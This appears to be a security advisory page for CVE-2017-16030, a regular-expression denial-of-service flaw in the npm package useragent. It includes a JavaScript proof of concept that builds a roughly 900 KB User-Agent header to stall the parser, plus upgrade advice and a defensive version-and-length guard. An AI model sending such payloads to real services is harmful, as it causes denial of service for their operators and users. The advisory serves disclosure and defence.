CVE-2017-16030
ReDoS via long UserAgent header in useragent
EPSS 0.43%
Description
Affected versions of `useragent` are vulnerable to regular expression denial of service when an arbitrarily long `User-Agent` header is parsed.

## Proof of Concept

```js
var useragent = require('useragent');
// A ~900 KB User-Agent value that triggers the backtracking regex.
var badUserAgent = 'MSIE 0.0' + Array(900000).join('0') + 'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));
```

## Recommendation

Update to version 2.1.13 or later.
How to fix CVE-2017-16030
To remediate CVE-2017-16030, upgrade the affected package to a fixed version below.
- `useragent`: upgrade to 2.1.13 or later
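As an added example (not part of this advisory or the `useragent` project), a defensive wrapper that checks an installed version against the affected range above and refuses to hand an oversized `User-Agent` value to the parser. The 1024-byte limit and the injected `parse` callback are assumptions, so the snippet runs without the package installed.

```javascript
'use strict';

// Affected range from the advisory: every release below 2.1.13.
const FIXED_VERSION = [2, 1, 13];

// Compare a dotted version string ("2.1.12") with the fixed release.
// Returns true when the installed version is in the affected range (< 2.1.13).
function isAffectedVersion(version) {
  const parts = String(version).split('.').map(n => parseInt(n, 10) || 0);
  for (let i = 0; i < FIXED_VERSION.length; i++) {
    const have = parts[i] || 0;
    if (have < FIXED_VERSION[i]) return true;
    if (have > FIXED_VERSION[i]) return false;
  }
  return false; // exactly 2.1.13
}

// Real User-Agent strings are a few hundred bytes; the PoC is ~900 KB.
// Assumed limit (not from the advisory): 1024 bytes.
const MAX_USER_AGENT_LENGTH = 1024;

// Return the header when it is within the limit, otherwise null so the
// caller skips parsing instead of feeding the regex a pathological input.
function boundedUserAgent(header) {
  if (typeof header !== 'string') return null;
  if (Buffer.byteLength(header, 'utf8') > MAX_USER_AGENT_LENGTH) return null;
  return header;
}

// `parse` is whatever UA parser the application uses (e.g. useragent.parse
// on a patched version); it is passed in here so this file runs stand-alone.
function parseUserAgentSafely(header, parse) {
  const ua = boundedUserAgent(header);
  if (ua === null) return { rejected: true, family: 'Other' };
  return parse(ua);
}

// Constructed sample: the advisory's PoC string versus a normal header.
const pocUserAgent = 'MSIE 0.0' + Array(900000).join('0') + 'XBLWP';
const normalUserAgent = 'Mozilla/5.0 (X11; Linux x86_64)';
```

Apply the guard before any version-specific parsing, and treat a rejected header as a signal worth logging, since legitimate clients never send one that large.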
Is CVE-2017-16030 being exploited?
Low — EPSS is 0.4%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- `useragent`: all versions from 0 up to, but not including, 2.1.13